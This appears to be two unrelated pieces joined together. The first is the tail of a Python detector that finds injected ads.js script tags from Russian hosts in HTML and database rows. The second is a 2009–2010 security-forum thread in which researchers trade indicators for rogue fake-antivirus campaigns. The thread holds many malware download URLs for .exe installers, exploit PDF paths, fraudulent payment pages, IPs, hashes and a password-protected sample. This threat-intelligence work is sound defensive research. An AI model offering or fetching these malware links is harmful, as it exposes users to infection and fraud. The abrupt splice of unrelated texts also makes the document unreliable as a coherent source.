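    """Return (host, path) for a script src, tolerating a missing scheme."""
    if "://" not in src and not src.startswith("//"):
        src = "//" + src  # e.g. "www.adtcp.ru/ads.js" -> parse as network path
    parsed = urlparse(src)
    return (parsed.hostname or "").lower(), parsed.path


def classify_script_src(src):
    """Return a reason string if src looks like the injected tag, else None."""
    host, path = _host_and_path(src)
    if not host:
        return None  # relative/local script, not part of this pattern
    # Assumption: a leading "www." is the same registrable host for our purposes.
    base = host[4:] if host.startswith("www.") else host
    if base in INJECT_HOSTS:
        return "known injection host"
    if path.endswith("/ads.js"):
        return "ads.js on unlisted host"  # lower confidence: review manually
    return None


def find_injected_scripts(html):
    """Scan one HTML document; return [(src, reason)] for suspect script tags."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        reason = classify_script_src(src)
        if reason:
            hits.append((src, reason))
    return hits


def scan_db_rows(rows):
    """Scan text columns of exported rows (the tag is written into SQL text fields).

    rows: list of dicts. Returns [(row_index, column, src, reason)].
    """
    findings = []
    for i, row in enumerate(rows):
        for col, val in row.items():
            if isinstance(val, str) and "<script" in val.lower():
                for src, reason in find_injected_scripts(val):
                    findings.append((i, col, src, reason))
    return findings


# Constructed samples (not captured from any real site).
CLEAN_PAGE = '<html><head><script src="/js/jquery.js"></script></head><body>hi</body></html>'
INJECTED_PAGE = ('<html><body><p>Product news</p>'
                 '<script src=http://www.adtcp.ru/ads.js></script></body></html>')
SAMPLE_ROWS = [
    {"id": 1, "title": "Welcome", "body": "Plain text"},
    {"id": 2, "title": "Specials", "body": 'Sale!<script src="http://ads-t.ru/ads.js"></script>'},
    {"id": 3, "title": "Other", "body": "<script src='http://cdn.example.com/ads.js'></script>"},
]

if __name__ == "__main__":
    print(find_injected_scripts(CLEAN_PAGE))
    print(find_injected_scripts(INJECTED_PAGE))
    for finding in scan_db_rows(SAMPLE_ROWS):
        print(finding)
```

Run it against an HTML crawl or a text-column export of the affected tables; the "unlisted host" reason is there because the quote notes the hosting site has changed from ads-t.ru to adtcp.ru, so new hosts with the same path are worth a look.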
Title: Re: Rogue - Fake AV
Post by: RS-232 on October 01, 2009, 07:00:02 pm
Some more info about the recent Asprox attacks...
http://phil-secu.over-blog.net/article-36697187.html
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 07:18:39 pm
Quote
Some more info about the recent Asprox attacks...
http://phil-secu.over-blog.net/article-36697187.html

The article mentions the low detection rate of the pdf exploit.
This is the current status:
https://www.virustotal.com/analisis/697993b5e5e7d882aa66a8ccef66363b22439bcf770513c2800c6de136c2a164-1254424431
McAfee   5758   2009.10.01   Exploit-PDF.q.gen!stream
McAfee+Artemis   5758   2009.10.01   Exploit-PDF.q.gen!stream
Sophos   4.45.0   2009.10.01   Troj/PDFJs-DJ
Sunbelt   3.2.1858.2   2009.10.01   Exploit.PDF-JS.Gen (v)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 07:33:28 pm
TE report of the pdf payload
http://www.threatexpert.com/report.aspx?md5=a44f0a660223e92d3119d49e5fce20ef

VT 6/41
http://www.virustotal.com/analisis/7d01a99514d5c2b6c5f8c81b0aa8c697b869c87d7f0f66797d6f2319c07d67cf-1254425485
AntiVir   7.9.1.27   2009.10.01   TR/FraudPack.ams
F-Secure   8.0.14470.0   2009.10.01   Suspicious:W32/Malware!Gemini
McAfee+Artemis   5758   2009.10.01   Artemis!A44F0A660223
McAfee-GW-Edition   6.8.5   2009.10.01   Trojan.FraudPack.ams
Microsoft   1.5101   2009.10.01   VirTool:Win32/Obfuscator.FI
Rising   21.49.22.00   2009.09.30   Packer.Win32.UnkPacker.a
Title: Re: Rogue - Fake AV
Post by: RS-232 on October 02, 2009, 09:24:32 am
...based on the TE reports above, some of them already added - you're faster than me... ;)

Result: 12/41 (29.27%)
http://www.virustotal.com/analisis/4487fbec24ab08491e1e5272ed6079ab82dd081ecbcf1915cc805499214978fb-1254474418

Quote
hxxp://linkertagubert.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://okavanubares.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://buleropihertan.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://konitorsabure.com/apw1f1Vj0K3F0vdR4Ew7Xl
hxxp://ofaderhabewuit.com/apw1f1Vj0K3F0vdR4Ew7Xl
hxxp://uvgaderbotario.com/apw1f1Vj0K3F0vdR4Ew7Xl

Code: [Select]
linkertagubert.com   69.10.61.243
okavanubares.com     69.10.61.244
buleropihertan.com   69.10.61.245

linkertagubert.com   74.86.145.48
okavanubares.com     74.86.145.49
buleropihertan.com   74.86.145.50

ofaderhabewuit.com   66.79.179.44
konitorsabure.com    66.79.179.45
uvgaderbotario.com   66.79.179.46

A "lonesome" one of the same... 69.10.40.163:
Quote
hxxp://dabertugaburav.com/apw1f1Vj0K3F0vdR4Ew7Xl

Quote
hxxp://ertonaferdogalo.com/apw1f1Vj0K3F0vdR4Ew7Xl -> 204.12.226.67 (and/or) 204.27.58.230...
hxxp://ertugasedumil.com/apw1f1Vj0K3F0vdR4Ew7Xl    -> 204.12.226.68 (and/or) 204.27.58.231...
hxxp://ertunagertos.com/apw1f1Vj0K3F0vdR4Ew7Xl      -> 204.27.58.232
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 03, 2009, 10:05:05 am

directs to fake av:
Code: [Select]
buenavistasocialclub.cn/go.php?id=2004&key=ff0057594&p=1
writeloveonherarms.cn/go.php?id=2035&key=6165353a7&p=1
friedgreentomatoes.cn/go.php?id=2035&key=6165353a7&p=1
decoratingcatalog.cn/go.php?id=2035&key=6165353a7&p=1

fake av - personal antivirus:
Code: [Select]
liveantimalwareproscanv2.com/uninstall_pav.exe
fraudulent payment page:
Code: [Select]
https://secure.personalpurchuaseweb.com
https://secure.online-soft-payments.com/buy.php
https://online-soft-payments.com/buy.php
https://computerguardsoft.com/buy.php
https://secure.computerguardsoft.com/billing/?product=PAV

some new registrations over the past few days:
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 03, 2009, 10:31:58 am
winwebsecurity fake av:
Code: [Select]
securitytestinternetguide.com/download.php
securitytestinternetguide.com/install/ws.exe
webbiztest.com/download.php
webbiztest.com/install/ws.exe
netmedtest.com/download.php
netmedtest.com/install/ws.exe
securitycodereviews.com/download.php
securitycodereviews.com/install/ws.exe

http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Date&search=php?affid=&colsearch=All&ascordesc=DESC&quantity=500&page=0

same:
Code: [Select]
astrologia.org.pl/downloads/install2.exe
other fake av:
Code: [Select]
windowspc-defender.com
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 04, 2009, 08:17:11 am
New campaign.

Code: [Select]
www.adtcp.ru/ads.js

Another one
Code: [Select]
adbnr.ru/ads.js
Title: Re: Rogue - Fake AV
Post by: SpiderLover on October 11, 2009, 03:00:41 pm
Code: [Select]
av-payment.com/choose
Rogue AV Payment page
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 17, 2009, 03:55:42 pm
rogue fakeplus downloader

payload: /installer.1.exe


other rogue:

Code: [Select]
waluesecadds.com
systemicoptimizer.com
personalguard2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 17, 2009, 04:04:38 pm
trojan fakescanti (WinAntivirusPro)

exploits:
Code: [Select]
seo-traff.com/counters/3/index.php
seo-traff.com/counters/3/allExact.pdf

trojan fakescanti:
Code: [Select]
seo-traff.com/counters/3/update.php
liberty cp:
Code: [Select]
seo-traff.com/counters/3/admin.php

trojan fakescanti:
Code: [Select]
core2842.pictureviewes.com/stget2.cgi?host=host&id=2842
payment page:

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 19, 2009, 08:18:26 am
related to AdvancedVirusRemover

fake scan page:
Code: [Select]
best-scan-pc.net/vista/
rogue av downloader
Code: [Select]
best-scan-pc.net/cgi-bin/load.pl
xxx-white-tube.net/cgi-bin/flashpatch.pl

trojan
Code: [Select]
downloadavr6.com/dfghfghgfj.dll
downloadavr6.com/cgi-bin/download.pl

rogue main site
Code: [Select]
advanced-virus-remover-2009.com
advanced-virus-remover2009.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirusremover-2009.com
advancedvirus-remover2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on November 06, 2009, 09:22:00 am
MaCatte not McAfee:

Code: [Select]
macatte.com
share IP with the Rogue GreenAVPro family
http://www.malwareurl.com/listing.php?domain=macatte.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on November 06, 2009, 09:32:02 am
a red flag for this one: http://www.siteadvisor.pl/sites/macatte.com

http://bharath-m-narayan.blogspot.com/2009/11/macatte.html
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.TUL&VSect=T
Title: Re: Rogue - Fake AV
Post by: sriramp on November 09, 2009, 12:15:34 am
This Rogue is currently Live

Code: [Select]
http://webviruscheck5.com/download/Inst_312s1.exe
Title: Re: Rogue - Fake AV
Post by: Curson on February 14, 2010, 05:35:02 pm
Hi all,

Code: [Select]
http://homeamateurclips.com/video/video.exe
Fake av with TDL3.

Main page :
Code: [Select]
http://hqexgirl.osa.pl
Greetings.
Title: Re: Rogue - Fake AV
Post by: wexxlar on February 19, 2010, 03:14:37 pm
Code: [Select]
http://91.212.132.241/download/Setup_28.exe
http://www.virustotal.com/analisis/58bc59772df8e363a18fa0ac484f1452843f7d7c713cc39d7c6a82290d42e28e-1266591562

Title: Re: Rogue - Fake AV
Post by: Curson on February 20, 2010, 11:13:39 pm
Hi,

New Fake Av Desktop Security 2010
Code: [Select]
http://windesktopsecurity.com/SecurityInstall.exe
Affiled site :
Code: [Select]
http://allshouldbedone.in
Greetings.
Title: Re: Rogue - Fake AV
Post by: jackberri on February 22, 2010, 08:48:11 pm
Fake AV
Code: [Select]
hxxp://characterscaner.cn/pav_db
hxxp://characterscaner.cn/pav_ext
hxxp://characterscaner.cn/pav_hook
hxxp://characterscaner.cn/pav_un
hxxp://characterscaner.cn/pav_main
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 23, 2010, 03:13:17 pm
Currently active:

http://91[.]212[.]127[.]252/download/Setup_411[.]exe
http://91[.]212[.]127[.]252/download//download/Setup_103[.]exe


http://www.virustotal.com/analisis/cff397f260e39d5fa326626eb7acde49938ed21c1b52ac6ec70594595060e470-1266934629
http://wepawet.cs.ucsb.edu/view.php?hash=784fa03ce9909842dd5ed518663ce54e&t=1266936206&type=js
http://anubis.iseclab.org/?action=result&task_id=1ab1ee5ffc1eb1b24a5080e64a16951f8&format=html
http://www.robtex.com/ip/91.212.127.252.html#blacklists

File name: Setup_***.exe (The last three characters change)
File size: 230,912 Bytes
MD5: be76806ba943ef01d476031a0abb21c5
Detected as: Trojan.Win32.FakeAV

Enjoy!
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 23, 2010, 06:07:29 pm
Seems to be random php files (not an expert on this behavior)

http://173[.]212[.]228[.]196/8_82ed2e[.]php

http://safeweb.norton.com/report/show?url=173.212.228.196&x=0&y=0
http://www.siteadvisor.com/sites/173.212.228.196
http://www.google.com/safebrowsing/diagnostic?site=173.212.228.196
http://www.virustotal.com/analisis/65f7802a4f319de8fa0a95416767d434116a2291e7a32710f229d18833ae79dd-1266942593
http://anubis.iseclab.org/?action=result&task_id=12a0eb71a94750034edc9704cc1fda73d&format=html

File size: 1,049,600 Bytes
MD5: 8dd1b89ff6cd0a9853dc2865dc0290ef 
Detected as: Trojan.Win32.FakeAV

Enjoy!
Title: Re: Rogue - Fake AV
Post by: SysAdMini on February 23, 2010, 07:50:27 pm
Seems to be random php files (not an expert on this behavior)

http://173[.]212[.]228[.]196/8_82ed2e[.]php


attached decoded sample.

pw: infected
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 25, 2010, 02:09:44 pm
Active and detected as Trojan.FakeAV

http://195[.]5[.]161[.]120/download/Setup_295[.]exe

File size: 239616 bytes
MD5: 1e3ffe4faf4e3f0246db2f8eefdd317f

http://wepawet.cs.ucsb.edu/view.php?hash=63ab520c2ac5acd2584c6749704af6c5&t=1267104573&type=js
http://www.virustotal.com/analisis/b1283d768f77795bffce6b909f10422818ae1bd7be277b43adbee98bef123205-1267099055
   
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 05:33:06 pm
Virus Protector pr0n + setup

http://tubess.twilightparadox.com/land/?n=teen&id=1
http://tubess.twilightparadox.com/land/adobe-91633/adobeflashplayerv10.0.45.2.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 06:33:28 pm
Personal Security
http://c3872131.time-defender9.com/download/Setup_28.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 09:34:39 pm
Antivirus 7
http://91.212.127.3/download/ASetup_2009.exe

Edit: May be old... but still working
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 24, 2010, 10:53:36 am
CleanUpAntivirus

http://fuko17ro5.xorg.pl/build6_287.php?cmd=sendFile&counter=1&p=p52dcWpsb1%2FCj8bYbnOCdVik12qYVp%2FZatrau4FdlJ%2FJnsWYe3lvWqyopHbCXsmaaGaRbWtqyFPVpJHaotahlFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1nV2QZGCUZJuSmGpdpJvLnomtpXFqZm5tbGuYYZqcV6SgZm9plmObZGKdYZmaiZSab3y3
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 04, 2010, 10:20:26 pm
Your Protection (Trojan Downloader: downloads rogue + TDSS):
http://booty.crabdance.com/land/adobe-40584/adobeflashplayerv10.0.45.2.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 06:25:57 am
Script Kiddie Fake AV:
http://user-av2010.tk/
http://userantivirus2010pro.yolasite.com/
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 10:48:59 am
Rogue-Downloader:
http://rustubexxs.twilightparadox.com/land/adobe-41148/adobeflashplayerv10.0.45.2.exe

downloads: Your Protection rogues +TDSS
http://www.hooksearchup.org/up3/setup
http://findernos.org/up3/install01
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 11:30:28 am
Your protection + TDSS

http://www.securityletters.com/up3/setup
http://www.securityletters.com/up3/install01
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 06, 2010, 05:46:31 pm
list of Rogue AV sites registered today

http://pastebin.com/pMqv0WT7
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 08, 2010, 02:48:37 pm
Installs a variant of the XP Antispyware 2010/XP Security Tool family I believe.
Code: [Select]
http://bitnoora.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 09, 2010, 02:15:30 am
Looks like another site hosting an installer for the XP AntiMalware 2010 family...
Code: [Select]
http://teendoos.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: Curson on April 10, 2010, 12:19:18 am
Rogue-Downloader named "virii cleaner setup"
hxxp://ettmiss.com/download/0bffb6b280da25f431e0568837e0716a/f85b7b377112c272bc87f3e73f10508d/4

Download: Virus Protector
hxxp://www.bestantiv.com/lol_aocsjerbt_aocsjerbt.phtml?get=20ec449778858d3062592f457c0c4d4f


Title: Re: Rogue - Fake AV
Post by: crunchtime on April 13, 2010, 04:13:48 am
Rogue AV: hxxp://dwnk.in/appreg70700.exe
VirusTotal: http://www.virustotal.com/analisis/e49775111177cc82f806e378fee7c1f4cf9690e86d4b3d6f81be2f57932b0e85-1271021506
Other details: Directi domain/beavers.helen@yahoo.com
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 17, 2010, 07:20:00 pm
Another one from the XP Security Tool family.
Code: [Select]
http://mpprrppmm.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 01:33:07 am
Fakesmoke/Virus Protector.
Code: [Select]
http://biteco.co.tv/components/flash_installer.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 02:21:30 am
Another one from the XP Security Tool family:
Code: [Select]
http://tauvrioaa.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 06:26:05 pm
Code: [Select]
http://91.188.59.184/main.php?land=44&affid=21700
Fake codec page.
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 23, 2010, 01:19:54 pm
New rogue TrustDoctor.

Fake Scanner Page.
Code: [Select]
http://callme.rideandbuy.in/?8fa37fbad415d6e9bd7ec4578a177071
Fakesmoke/TrustDoctor.
Code: [Select]
http://filesdownload.in/down/3732f9b31cece5374907f816227c13b3e92fb8cf212a14e06ab464573aae260d4bf11ca41065af3995b4162722f0dbf2a5f50e1e5d77f626b1b8bbcd7cb56a63ff2995bcfb5e2c966c94ebd1fa27c3c011047c8ba3eec0cedf48a9f09ab4940b10e239ea92e299419050247df7f27b7aa2acb5f5b98261a4d73cbfd8ec1b85b6c9dfc82108dca2bd908db707af457f56f56781b8287f8e0967bd41668072adad
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 23, 2010, 03:18:03 pm
Fake Scanner Page.
Code: [Select]
http://91.188.59.190/main.php?land=20&affid=12400
Title: Re: Rogue - Fake AV
Post by: cheezer on May 18, 2010, 08:05:38 pm
www1.bestgardever5.net  - ET TROJAN Potential Gemini/Fake AV Download URL Detected
Title: Re: Rogue - Fake AV
Post by: acb on June 05, 2010, 03:02:17 am
Fake scanner/Rogue AV downloader "PC_protect.exe"

hxxp://core2958.mylivejournalchanel.com/stget2.cgi?host=host&id=2958